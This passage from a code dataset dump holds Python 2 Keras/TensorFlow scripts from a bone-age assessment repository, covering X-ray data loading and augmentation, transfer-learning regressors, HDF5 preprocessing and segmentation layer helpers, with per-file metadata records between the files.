dtype=np.float32)\n img = preprocess_fn(img)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n x.append(img)\n y.append(boneage)\n\n x = np.array(x, dtype=np.float32)\n y = np.array(y, dtype=np.float32)\n y = y / SCALE\n print \"[x] load %d data\" % x.shape[0]\n return x, y, original_int_images\n\n\n\n\ndef _build_regresser(model_name, weights, num_gpu, fine_tune):\n input_shape = (299, 299, 3)\n if model_name == \"inception_v3\":\n base_model = InceptionV3(input_shape=input_shape, weights=weights, include_top=False)\n elif model_name == \"inception_resnet_v2\":\n base_model = InceptionResNetV2(input_shape=input_shape, weights=weights, include_top=False)\n elif model_name == \"xception\":\n base_model = Xception(input_shape=input_shape, weights=weights, include_top=False)\n else:\n raise ValueError(\"NOT A SUPPORT MODEL\")\n\n if model_name == \"inception_v3\":\n if fine_tune == INCEPTION_V3_INCEPTION_3:\n start = INCEPTION_V3_INCEPTION_3_START\n elif fine_tune == INCEPTION_V3_INCEPTION_4:\n start = INCEPTION_V3_INCEPTION_4_START\n elif fine_tune == INCEPTION_V3_INCEPTION_5:\n start = INCEPTION_V3_INCEPTION_5_START\n elif fine_tune == FINE_TUNE_ALL:\n start = -1\n elif model_name == \"inception_resnet_v2\":\n if fine_tune == INCEPTION_RESNET_V2_INCEPTION_A:\n start = INCEPTION_RESNET_V2_INCEPTION_A_START\n elif fine_tune == INCEPTION_RESNET_V2_INCEPTION_B:\n start = INCEPTION_RESNET_V2_INCEPTION_B_START\n elif fine_tune == INCEPTION_RESNET_V2_INCEPTION_C:\n start = INCEPTION_RESNET_V2_INCEPTION_C_START\n elif fine_tune == FINE_TUNE_ALL:\n start = -1\n elif model_name == \"xception\":\n if fine_tune == XCEPTION_ENTRY:\n start = XCEPTION_ENTRY_START\n elif fine_tune == XCEPTION_MID:\n start = XCEPTION_MID_START\n elif fine_tune == XCEPTION_EXIT:\n start = XCEPTION_EXIT_START\n elif fine_tune == FINE_TUNE_ALL:\n start = -1\n else:\n raise ValueError(\"NOT A SUPPORT MODEL\")\n\n for i, layer in enumerate(base_model.layers):\n if i < start:\n layer.trainable = False\n else:\n layer.trainable = True\n\n x = 
base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n print predictions.get_shape()\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=5E-4, decay=0.95)\n if num_gpu > 1:\n model = multi_gpu_model(model, num_gpu)\n print \"[x] compile model on %d GPU(s)\" % num_gpu\n model.compile(optimizer=optimizer, loss='mean_absolute_error')\n\n return model, input_shape, base_model\n\n\ndef _batch_cvt(batch_data):\n imgs = []\n for data in batch_data:\n img = np.squeeze(data)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n imgs.append(img)\n imgs = np.array(imgs, dtype=np.float32)\n return imgs\n\n\ndef train(model_name,\n weights=\"imagenet\",\n n_epoch=N_TRAINING_EPOCH,\n sex=0,\n batch_size=16,\n augment=False,\n num_gpu=1,\n fine_tune=\"\"):\n model, input_shape, base_model = _build_regresser(model_name, weights, num_gpu, fine_tune)\n if model_name == \"inception_v3\":\n preprocess_fn = inception_v3_input\n elif model_name == \"inception_resnet_v2\":\n preprocess_fn = inception_resnet_input\n elif model_name == \"xception\":\n preprocess_fn = xception_input\n else:\n raise ValueError(\"Not a supported model name\")\n\n data_x, data_y = load_data(sex, input_shape[0], augment, preprocess_fn)\n print \"[x] total data size {} G\".format(sys.getsizeof(data_x)/1024**3)\n best_loss = np.inf\n weights_history = []\n for epoch in tqdm(range(n_epoch)):\n print \"========================================================================================================\"\n x_train, x_test, y_train, y_test = train_test_split(data_x, data_y, test_size=0.3, random_state=0, shuffle=True)\n for mini_batch in range(x_train.shape[0] // batch_size):\n batch_x = x_train[mini_batch * batch_size: (mini_batch + 1) * batch_size]\n batch_x_cvt = _batch_cvt(batch_x)\n batch_y = y_train[mini_batch * batch_size: (mini_batch + 1) * batch_size]\n loss = model.train_on_batch(x=batch_x_cvt, y=batch_y)\n if mini_batch % 100 == 0:\n print \"--epoch {}, mini_batch {}, loss {}\".format(epoch, mini_batch, loss)\n weights_history.append(model.layers[-1].get_weights()[0])\n\n # test\n print \"[x] test in epoch {}\".format(epoch)\n losses = 0.0\n for mini_batch in range(x_test.shape[0] // batch_size):\n batch_x = x_test[mini_batch * (batch_size): (mini_batch + 1) * batch_size]\n batch_y = y_test[mini_batch * (batch_size): (mini_batch + 1) * batch_size]\n batch_x_cvt = _batch_cvt(batch_x)\n loss = model.test_on_batch(batch_x_cvt, batch_y)\n losses += loss\n losses = losses/(x_test.shape[0] // batch_size)\n if losses < best_loss:\n best_loss = losses\n model.save_weights(model_out_dir + \"/epoch_{}.h5\".format(epoch))\n print \"== epoch {}, test loss {}\".format(epoch, losses)\n\n # test and metric\n print \"[x] predict in epoch {}\".format(epoch)\n y_true = []\n y_pred = []\n for mini_batch in range(x_test.shape[0] // batch_size):\n batch_x = x_test[mini_batch*(batch_size): (mini_batch+1)*batch_size]\n batch_y = y_test[mini_batch*(batch_size): (mini_batch+1)*batch_size]\n batch_x_cvt = _batch_cvt(batch_x)\n pred_y = model.predict_on_batch(batch_x_cvt)\n for i in range(batch_size):\n y_true.append(batch_y[i]*SCALE)\n y_pred.append(pred_y[i]*SCALE)\n\n evs, mae, mse, meae, r2s, ccc = regression_metric(np.array(y_true), np.array(y_pred))\n save_obj({\"evs\": evs,\n \"mae\": mae,\n \"mse\": mse,\n \"meae\": meae,\n \"r2s\": r2s,\n \"ccc\": ccc,\n \"loss\": losses},\n name=metric_out_dir+\"/epoch_{}.pkl\".format(epoch))\n print \"[x] 
epoch {}, evs {}, mae {}, mse {}, meae {}, r2s {}, ccc {}\".format(epoch, evs, mae, mse, meae, r2s, ccc)\n\n return weights_history, base_model, input_shape[0], preprocess_fn\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=128)\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"xception\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"cam\")\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--augment', type=str, help=\"augment data\", default=\"true\")\n parser.add_argument('--fine_tune', type=str, help=\"fine tune pretrained layer\", default=\"3\")\n parser.add_argument('--gpu_id', type=int, default=0)\n FLAGS = parser.parse_args()\n\n pprint.pprint(FLAGS)\n\n num_gpu = 1\n gpu_id = FLAGS.gpu_id\n\n print \"[x] building models on GPU: {}\".format(gpu_id)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n batch_size = FLAGS.batch_size * num_gpu\n model_name = FLAGS.model_name\n exp_name = FLAGS.exp\n sex = FLAGS.sex\n augment_data = True if FLAGS.augment == \"true\" else False\n fine_tune = FLAGS.fine_tune\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n metric_out_dir = \"E{}_M{}_S{}_A{}_F{}/metric\".format(exp_name, model_name, sex, augment_data, fine_tune)\n model_out_dir = \"E{}_M{}_S{}_A{}_F{}/model\".format(exp_name, model_name, sex, augment_data, fine_tune)\n if not os.path.isdir(metric_out_dir):\n os.makedirs(metric_out_dir)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n\n # training\n weights_history, base_model, img_size, pre_fn = \\\n train(model_name=model_name, weights=\"imagenet\", n_epoch=N_TRAINING_EPOCH, sex=sex,\n batch_size=batch_size, augment=augment_data, num_gpu=num_gpu, fine_tune=fine_tune)\n\n # save weight and base model\n save_obj(weights_history, name=model_out_dir + \"/weights_history.pkl\")\n base_model.save_weights(filepath=model_out_dir + \"/base_model.h5\")\n" }, { "alpha_fraction": 0.6392620205879211, "alphanum_fraction": 0.6556077003479004, "avg_line_length": 31.87234115600586, "blob_id": "9afe94ff8fd71bdba511860e20060f23dfa15f32", "content_id": "c8a20f5ab2570c98682969e99d5e7c97d74a6ec4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6179, "license_type": "no_license", "max_line_length": 126, "num_lines": 188, "path": "/vallina_transfer_learning/utils.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport cv2\nimport os\nimport pickle\nimport h5py\nimport keras\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import 
preprocess_input as xception_input\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, median_absolute_error, r2_score, explained_variance_score\nfrom tqdm import tqdm\nfrom config import *\n\n\ndef _batch_cvt(batch_data):\n imgs = []\n for data in batch_data:\n img = np.squeeze(data)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n imgs.append(img)\n imgs = np.array(imgs, dtype=np.float32)\n return imgs\n\n\ndef save_obj(obj, name):\n with open(name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(name):\n with open(name, 'rb') as f:\n return pickle.load(f)\n\n\ndef load_hdf5(infile, key=\"data\"):\n with h5py.File(infile, \"r\") as f:\n return f[key][()]\n\n\ndef write_hdf5(value, outfile, key=\"data\"):\n with h5py.File(outfile, \"w\") as f:\n f.create_dataset(key, data=value, dtype=value.dtype)\n\n\ndef load_sex_ids(sex=0):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n ids = []\n if sex == 0:\n for i in range(len(dataset_df.index)):\n id = dataset_df.ix[dataset_df.index[i]]['id']\n ids.append(id)\n elif sex == 1:\n sex_df = dataset_df[dataset_df.male == True]\n for i in range(len(sex_df.index)):\n id = dataset_df.ix[sex_df.index[i]]['id']\n ids.append(id)\n elif sex == 2:\n sex_df = dataset_df[dataset_df.male == False]\n for i in range(len(sex_df.index)):\n id = dataset_df.ix[sex_df.index[i]]['id']\n ids.append(id)\n\n return np.array(ids)\n\n\ndef load_data(sex=0, img_size=299, batch_size=32, augment_times=5):\n data_ids = load_sex_ids(sex)\n select_ids = np.random.permutation(data_ids)[:batch_size]\n batch_x, batch_y = augment_data_with_ids(select_ids, img_size, augment_times=augment_times)\n return _batch_cvt(batch_x), batch_y\n\n\ndef augment_data_with_ids(ids, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_TRAIN_DATA, augment_times=5):\n imgs = []\n boneages = []\n for id in ids:\n ims, bas = _augment_data_with_id(id, img_size, preprocess_fn, data_dir, augment_times)\n imgs.extend(ims)\n boneages.extend(bas)\n\n imgs = np.array(imgs, dtype=np.float32)\n boneages = np.array(boneages, dtype=np.float32)\n indexes = np.random.permutation(range(imgs.shape[0]))\n imgs = imgs[indexes]\n boneages = boneages[indexes]\n return imgs, boneages\n\n\ndef load_data_sex(sex, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_TRAIN_DATA):\n ids = load_sex_ids(sex)\n imgs = []\n boneages = []\n for _id in tqdm(ids):\n img, boneage = load_single_with_id(_id, img_size, preprocess_fn, data_dir)\n imgs.append(img)\n boneages.append(boneage)\n return np.array(imgs, dtype=np.float32), np.array(boneages, dtype=np.float32)\n\n\ndef load_single_with_id(_id, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_TRAIN_DATA):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n boneage = dataset_df.loc[dataset_df[\"id\"] == _id].boneage.values[0] / SCALE\n img_file_name = data_dir + \"/{}.png\".format(_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_COLOR)\n img = cv2.resize(img, (img_size, img_size))\n img = preprocess_fn(np.array(img, dtype=np.float32))\n return img, boneage\n\n\ndef _pprint(content):\n if content.startswith(\"T\") or content.startswith(\"N\"):\n print content\n\n\nclass LossHistory(keras.callbacks.Callback):\n\n def on_train_begin(self, logs={}):\n self.losses = []\n\n def on_epoch_end(self, epoch, logs=None):\n self.losses.append(logs.get(\"loss\"))\n\n\ndef _augment_data_with_id(_id, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_TRAIN_DATA, augment_times=5):\n 
\"\"\"\n Online sampling with data augmentation\n :param _id:\n :param img_size:\n :param preprocess_fn:\n :param dataset_df:\n :param data_dir:\n :param augment_times:\n :return:\n \"\"\"\n imgs = []\n boneages = []\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n\n boneage = dataset_df.loc[dataset_df[\"id\"]==_id].boneage.values[0] / SCALE\n img_file_name = data_dir + \"/{}.png\".format(_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n\n imgs.append(preprocess_fn(np.array(img, dtype=np.float32)))\n boneages.append(boneage)\n\n if augment_times > 0:\n flipped = cv2.flip(img, 1) # horzational flip\n imgs.append(preprocess_fn(np.array(flipped, dtype=np.float32)))\n boneages.append(boneage)\n for i in range(augment_times):\n angle = np.random.randint(0, 360)\n M = cv2.getRotationMatrix2D(center=(img.shape[0] / 2, img.shape[1] / 2), angle=angle, scale=1)\n dst_ori = cv2.warpAffine(img, M, (img.shape[0], img.shape[1]), borderMode=cv2.BORDER_CONSTANT, borderValue=0)\n dst_flip = cv2.warpAffine(flipped, M, (img.shape[0], img.shape[1]), borderMode=cv2.BORDER_CONSTANT, borderValue=0)\n imgs.append(preprocess_fn(np.array(dst_ori, dtype=np.float32)))\n imgs.append(preprocess_fn(np.array(dst_flip, dtype=np.float32)))\n\n boneages.append(boneage)\n boneages.append(boneage)\n\n return imgs, boneages\n\n\nif __name__ == \"__main__\":\n \"\"\"\n data_x, data_y = \\\n load_data(sex=0, img_size=256, augment=False, preprocess_fn=inception_v3_input, debug=True, regression=False)\n \"\"\"\n import matplotlib.pyplot as plt\n\n imgs, boneages = load_data_sex(1)\n\n print imgs.shape\n print boneages.shape" }, { "alpha_fraction": 0.5686180591583252, "alphanum_fraction": 0.5808541178703308, "avg_line_length": 36.900001525878906, "blob_id": "ecb2b03174b777b7b2f1655f016cb3ce6ae0ffd8", "content_id": "ac478185eebf20b80e2bb095954e1ba0901a951c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4168, "license_type": "no_license", "max_line_length": 120, "num_lines": 110, "path": "/al_segmentation/step2_image_2_h5.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nimport argparse\nimport cv2\nimport utils_data\n\nfrom glob import glob\nfrom multiprocessing import Pool\nfrom tqdm import tqdm\n\nfrom config import *\n\n\ndef image_to_numpy(image_file, image_id, type=\"x\", save_dir=RSNA_GT_NP_ANNOTATED):\n assert type in [\"x\", \"y\"]\n img = cv2.imread(image_file, cv2.IMREAD_GRAYSCALE)\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n img = np.pad(img, pad_tuple, mode=\"constant\")\n img = cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE), interpolation=cv2.INTER_AREA)\n if type == \"x\":\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n img = clahe.apply(img)\n if type == \"y\":\n img[img > 0] = 255\n img = img / 255.\n img = np.array(img, dtype=np.float32)\n utils_data.write_hdf5(img, save_dir + \"/{}_{}.h5\".format(image_id, type))\n\n\ndef save_images(image_files, type=\"x\"):\n for f in tqdm(image_files):\n image_id = f[f.rfind(\"/\") + 1: f.find(\"_\")]\n image_to_numpy(f, image_id, type)\n\n\nif __name__ == \"__main__\":\n if not os.path.isdir(RSNA_GT_NP_ANNOTATED):\n os.makedirs(RSNA_GT_NP_ANNOTATED)\n if not os.path.isdir(RSNA_GT_NP_UNANNOTATED):\n 
os.makedirs(RSNA_GT_NP_UNANNOTATED)\n if not os.path.isdir(RSNA_GT_NEW):\n os.makedirs(RSNA_GT_NEW)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--num_process', type=int, help=\"number of process to run code\", default=4)\n parser.add_argument('--annotate', type=str, help=\"weather to save annotated or unannotated data\", default=\"adddata\")\n FLAGS = parser.parse_args()\n\n num_process = FLAGS.num_process\n annotate = FLAGS.annotate\n\n if annotate == \"annotate\":\n # initial annotated image data\n data_x_files = glob(RSNA_GT + \"/*_ori.png\")\n data_y_files = glob(RSNA_GT + \"/*_bin.png\")\n n_images = len(data_x_files)\n print \"[x] start to pre processing %d images\" % n_images\n\n if num_process > 1:\n p = Pool()\n for i in range(num_process):\n if i < num_process-1:\n sub_image_files_x = data_x_files[i*(n_images//num_process): (i+1)*(n_images//num_process)]\n sub_image_files_y = data_y_files[i*(n_images//num_process): (i+1)*(n_images//num_process)]\n else:\n sub_image_files_x = data_x_files[i*(n_images//num_process):]\n sub_image_files_y = data_y_files[i*(n_images//num_process):]\n p.apply_async(save_images, args=(sub_image_files_x, \"x\"))\n p.apply_async(save_images, args=(sub_image_files_y, \"y\"))\n p.close()\n p.join()\n else:\n save_images(data_x_files, \"x\")\n save_images(data_y_files, \"y\")\n elif annotate == \"unannotate\":\n # initial unannotated data\n import utils_data\n\n annotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=True)\n data_x_files = glob(RSNA_DATA_DIR + \"/*.png\")\n for f in tqdm(data_x_files):\n data_id = f[f.rfind(\"/\")+1: f.find(\".png\")]\n if data_id not in annotated_ids:\n image_to_numpy(f, data_id, type=\"x\", save_dir=RSNA_GT_NP_UNANNOTATED)\n\n elif annotate == \"adddata\":\n data_y_files = glob(RSNA_GT_NEW + \"/*_bin.png\")\n n_images = len(data_y_files)\n print \"[x] start to add %d images\" % n_images\n for f in data_y_files:\n data_id = f[f.rfind(\"/\")+1: f.find(\"_bin\")]\n print \"[x] add data %s \" % data_id\n image_x_file = RSNA_GT_NEW + \"/{}.png\".format(data_id)\n image_to_numpy(image_x_file, data_id, type=\"x\", save_dir=RSNA_GT_NP_ANNOTATED)\n image_to_numpy(f, data_id, type=\"y\", save_dir=RSNA_GT_NP_ANNOTATED)\n\n\n\"\"\"\nScript to initialize\npython step2_image_2_h5.py --annotate=annotate --num_process=4\npython step2_image_2_h5.py --annotate=unannotate\n\nScript to add data\npython step2_image_2_h5.py --annotate=adddata\n\"\"\"" }, { "alpha_fraction": 0.6316637396812439, "alphanum_fraction": 0.6429376602172852, "avg_line_length": 35.95833206176758, "blob_id": "6a54031b1bbd27480162db86816063e4052c9067", "content_id": "1427c875c47959affac57de6053095dbb593f0f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6209, "license_type": "no_license", "max_line_length": 104, "num_lines": 168, "path": "/paced_transfer/step1_ptl_gen.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport argparse\nimport os\nimport pprint\nimport keras\nimport time\nimport threading\nimport tensorflow as tf\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ModelCheckpoint\n\n\nfrom 
keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.models import Model\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\nfrom config import *\nfrom utils_training import _set_trainable_layers, _pprint\nfrom utils_data import load_sex_ids, load_data, save_obj, load_data_sex\nfrom utils_metric import regression_metric\n\n\ndef _build_regressor(img_size=299, num_gpu=1, start_layer=-1, model_file=None, learning_rate=1E-4):\n input_shape = (img_size, img_size, 3)\n if start_layer == -1:\n base_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\n _set_trainable_layers(base_model, len(base_model.layers))\n else:\n base_model = Xception(input_shape=input_shape, weights=None, include_top=False)\n _set_trainable_layers(base_model, start_layer)\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=learning_rate, decay=0.95)\n if num_gpu > 1:\n model = multi_gpu_model(model, num_gpu)\n print \"[x] compile model on %d GPU(s)\" % num_gpu\n\n if model_file!=None:\n model.load_weights(model_file)\n\n model.compile(optimizer=optimizer, loss=\"mean_squared_error\")\n model.summary(print_fn=_pprint)\n return model\n\n\nclass LossHistory(keras.callbacks.Callback):\n\n def on_train_begin(self, logs={}):\n self.losses = []\n\n def on_epoch_end(self, epoch, logs=None):\n self.losses.append(logs.get(\"loss\"))\n\n\ndef train(n_epoch=N_TRAINING_EPOCH, img_size=299, sex=0, batch_size=16, num_gpu=1, start_layer=-1):\n assert start_layer in [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n assert sex in [0, 1, 2]\n # model file path\n if start_layer != -1:\n model_file = model_out_dir+\"/model.h5\"\n else:\n model_file = None\n\n # learning rate\n if start_layer == -1:\n learning_rate = 1E-3\n elif start_layer == XCEPTION_EXIT_START:\n learning_rate = 1E-4\n elif start_layer == XCEPTION_MID_START:\n learning_rate = 5E-5\n elif start_layer == XCEPTION_ENTRY_START:\n learning_rate = 1E-5\n else:\n learning_rate = 5E-6\n\n model = _build_regressor(img_size, num_gpu, start_layer, model_file, learning_rate)\n\n print \"[x] load data ...\"\n data_x, data_y = load_data_sex(sex, img_size, xception_input)\n print \"[x] loaded data_x {}, data_y {} data\".format(data_x.shape, data_y.shape)\n\n data_gen = ImageDataGenerator(\n rotation_range=180,\n zoom_range=0.1,\n horizontal_flip=True\n )\n\n x_train, x_test, y_train, y_test = train_test_split(data_x, data_y)\n data_gen.fit(x_train)\n\n model_callback = ModelCheckpoint(filepath=model_out_dir+\"/model.h5\", verbose=1, save_best_only=True)\n loss_callback = LossHistory()\n model.fit_generator(data_gen.flow(x_train, y_train, batch_size=batch_size),\n validation_data=(x_test, y_test),\n workers=4,\n callbacks=[model_callback, loss_callback],\n use_multiprocessing=True,\n epochs=n_epoch)\n save_obj(obj=loss_callback.losses, name=metric_out_dir+\"/losses_S{}.pkl\".format(start_layer))\n\n y_true = []\n y_pred = []\n for mini_batch in range(int(data_x.shape[0] // batch_size)):\n pred_y = model.predict_on_batch(data_x[mini_batch*batch_size:(mini_batch+1)*batch_size])\n for i in range(batch_size):\n y_true.append(data_y[mini_batch*batch_size+i] * SCALE)\n y_pred.append(pred_y[i] * SCALE)\n\n evs, mae, mse, meae, r2s, ccc = regression_metric(np.array(y_true), np.array(y_pred))\n save_obj({\"evs\": evs, \"mae\": mae, \"mse\": 
mse, \"meae\": meae, \"r2s\": r2s, \"ccc\": ccc},\n name=metric_out_dir + \"/evaluate_S{}.pkl\".format(start_layer))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"rm\")\n parser.add_argument('--img_size', type=int, help=\"image size\", default=128)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=16)\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--start_layer', type=int, help=\"start_layer\", default=-1)\n parser.add_argument('--n_epoch', type=int, help=\"training epochs\", default=100)\n FLAGS = parser.parse_args()\n\n pprint.pprint(FLAGS)\n\n exp_name = FLAGS.exp\n img_size = FLAGS.img_size\n gpu_id = FLAGS.gpu_id\n batch_size = FLAGS.batch_size\n sex = FLAGS.sex\n start_layer = FLAGS.start_layer\n n_epoch = FLAGS.n_epoch\n\n print \"[x] building models on GPU {}\".format(gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n metric_out_dir = \"E{}_S{}_IMG_{}/metric\".format(exp_name, sex, img_size)\n model_out_dir = \"E{}_S{}_IMG_{}/model\".format(exp_name, sex, img_size)\n if not os.path.isdir(metric_out_dir):\n os.makedirs(metric_out_dir)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n\n # training\n train(n_epoch=n_epoch,\n img_size=img_size,\n sex=sex,\n batch_size=batch_size,\n num_gpu=1,\n start_layer=start_layer)\n" }, { "alpha_fraction": 0.5568181872367859, "alphanum_fraction": 0.5762032270431519, "avg_line_length": 40.953269958496094, "blob_id": "685332d56d6c60c0b9eb54a48f700ebb1c4297e6", "content_id": "949d7f27d374a361e6288614cfbda262f01bbf25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4488, "license_type": "no_license", "max_line_length": 104, "num_lines": 107, "path": "/al_segmentation/tf_ops.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import tensorflow as tf\n\nSMOOTH = 1.\nclass BatchNorm(object):\n\n def __init__(self, epsilon=1e-5, momentum=0.9, name='batch_norm'):\n with tf.variable_scope(name):\n self.epsilon = epsilon\n self.momentum = momentum\n self.name = name\n\n def __call__(self, x, train=True):\n return tf.contrib.layers.batch_norm(x,\n decay=self.momentum,\n updates_collections=None,\n epsilon=self.epsilon,\n scale=True,\n is_training=train,\n scope=self.name)\n\n\ndef conv2d(input_, output_dim, k=3, s=1, stddev=0.02, name='conv2d'):\n with tf.variable_scope(name):\n w = tf.get_variable('w', [k, k, input_.get_shape()[-1], output_dim],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(input_, w, strides=[1, s, s, 1], padding=\"SAME\")\n biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(value=0.0))\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())\n return conv\n\n\ndef deconv2d(input_, output_dim, k=3, s=1, stddev=0.02, name='deconv2d'):\n input_shape = input_.get_shape().as_list()\n output_shape = [input_shape[0], input_shape[1]*2, input_shape[2]*2, output_dim]\n with tf.variable_scope(name):\n w = tf.get_variable('w', [k, k, output_shape[-1], input_.get_shape()[-1]],\n 
initializer=tf.random_normal_initializer(stddev=stddev))\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape, strides=[1, s, s, 1])\n biases = tf.get_variable('biases', [output_shape[-1]],\n initializer=tf.constant_initializer(value=0.0))\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n return deconv\n\n\ndef upsampling2d(input_, output_dim, k=3, s=1, stddev=0.02, name='upsampling2d'):\n input_shape = input_.get_shape().as_list()\n output_shape = [input_shape[0], input_shape[1] * s, input_shape[2] * s, output_dim]\n with tf.variable_scope(name):\n w = tf.get_variable(\"w\", [k, k, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev))\n conv2d_trans = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,\n strides=[1, s, s, 1])\n biases = tf.get_variable('biases', [output_shape[-1]],\n initializer=tf.constant_initializer(value=0.0))\n conv2d_trans = tf.reshape(tf.nn.bias_add(conv2d_trans, biases), conv2d_trans.get_shape())\n return conv2d_trans\n\n\ndef maxpool2d(input_, k=2, s=2):\n return tf.nn.max_pool(input_, ksize=[1, k, k, 1], strides=[1, s, s, 1], padding=\"SAME\")\n\n\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):\n shape = input_.get_shape().as_list()\n\n with tf.variable_scope(scope or \"Linear\"):\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\n tf.random_normal_initializer(stddev=stddev))\n bias= tf.get_variable(\"bias\", [output_size], initializer=tf.constant_initializer(bias_start))\n if with_w:\n return tf.matmul(input_, matrix) + bias, matrix, bias\n else:\n return tf.matmul(input_, matrix)\n\n\ndef lrelu(x, leak=0.2):\n return tf.maximum(x, leak*x)\n\n\ndef relu(x):\n return tf.nn.relu(x)\n\n\ndef sigmoid(x):\n return tf.nn.sigmoid(x)\n\n\ndef dropout(x, keep_prob=0.5):\n return tf.nn.dropout(x, keep_prob)\n\n\ndef dice_coef_loss(prob, label):\n batch_size, h, w, n_class = label.get_shape().as_list()\n assert n_class == 1\n flat_label = tf.reshape(label, [-1, h*w*n_class])\n flat_prob = tf.reshape(prob, [-1, h*w*n_class])\n intersection = tf.reduce_mean(2*tf.multiply(flat_prob, flat_label))+SMOOTH\n union = tf.reduce_mean(tf.add(flat_prob, flat_label))+SMOOTH\n loss = 1 - tf.div(intersection, union)\n return loss\n\n\ndef pixelwise_cross_entropy(logit, label):\n flat_logit = tf.reshape(logit, [-1])\n flat_label = tf.reshape(label, [-1])\n loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=flat_logit, labels=flat_label))\n return loss" }, { "alpha_fraction": 0.6257668733596802, "alphanum_fraction": 0.6349693536758423, "avg_line_length": 22.285715103149414, "blob_id": 